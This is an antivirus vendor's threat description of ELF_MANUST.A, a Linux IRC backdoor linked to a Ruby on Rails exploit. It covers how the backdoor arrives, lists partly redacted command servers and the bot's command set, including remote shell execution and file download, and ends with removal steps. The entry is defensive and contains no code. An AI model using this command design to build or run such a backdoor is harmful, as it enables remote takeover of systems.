ELF_MANUST.A
Kaspersky: Backoor.Linux.Tsunami.gen
Linux
Threat Type: Backdoor
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
This is involved in an exploit attack targeting a critical vulnerability of Ruby on Rails. It connects to an IRC server where it can receive and perform commands from remote malicious attackers, as well as make the affected system part of its botnet. Affected users may find the security of their systems compromised.
To get a one-glance comprehensive view of the behavior of this Backdoor, refer to the Threat Diagram shown below.
This backdoor may be dropped by other malware. It may be unknowingly downloaded by a user while visiting malicious websites.
It connects to Internet Relay Chat (IRC) servers.
TECHNICAL DETAILS
Arrival Details
This backdoor may be dropped by other malware.
It may be unknowingly downloaded by a user while visiting malicious websites.
Backdoor Routine
This backdoor connects to any of the following Internet Relay Chat (IRC) servers:
- {BLOCKED}u.ru
- {BLOCKED}.{BLOCKED}.124.120
It accesses a remote Internet Relay Chat (IRC) server where it receives the following commands from a remote malicious user:
- NICK {nick} - change IRC nick
- SERVER {server} - change IRC Server
- KILL - terminate itself
- GET {http address} {save as} - download files on the compromised system
- HELP - show Help Info (set of commands accepted)
- IRC {command} - send message to IRC Server
- SH {command} - execute command on the compromised system
SOLUTION
Scan your computer with your Trend Micro product to delete files detected as ELF_MANUST.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
Did this description help? Tell us how we did.